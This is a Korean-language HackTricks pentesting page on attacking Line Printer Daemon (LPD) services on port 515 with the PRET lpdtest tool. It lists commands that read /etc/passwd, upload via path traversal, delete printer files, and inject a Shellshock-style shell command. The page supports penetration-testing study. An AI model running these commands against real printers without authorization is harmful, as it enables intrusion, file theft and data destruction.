515 - Pentesting Line Printer Daemon (LPD)

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

LPD 프로토콜 소개

1980년대에는 Line Printer Daemon (LPD) 프로토콜이 Berkeley Unix에서 개발되었으며, 나중에 RFC1179를 통해 공식화되었습니다. 이 프로토콜은 515/tcp 포트를 통해 작동하며, lpr 명령을 통해 상호작용할 수 있습니다. LPD를 통한 인쇄의 핵심은 제어 파일(작업 세부 정보 및 사용자 지정)과 함께 데이터 파일(인쇄 정보를 보유)을 보내는 것입니다. 제어 파일을 통해 데이터 파일에 대한 다양한 파일 형식을 선택할 수 있지만, 이러한 파일의 처리는 특정 LPD 구현에 따라 결정됩니다. Unix와 유사한 시스템에서 널리 인정받는 구현체는 LPRng입니다. 특히, LPD 프로토콜은 악성 PostScript 또는 PJL 인쇄 작업을 실행하기 위해 악용될 수 있습니다.

LPD 프린터와 상호작용하기 위한 도구

PRET는 LPD 호환 프린터와 상호작용하기 위한 두 가지 필수 도구인 lpdprintlpdtest를 소개합니다. 이 도구들은 데이터를 인쇄하거나 프린터 상의 파일을 조작하는 다양한 작업을 가능하게 합니다. 파일의 다운로드, 업로드, 삭제 등이 가능합니다:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

프린터 해킹을 더 탐구하고 싶은 개인들을 위한 포괄적인 자료는 Hacking Printers에서 찾을 수 있습니다.

Shodan

  • 포트 515

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

Last updated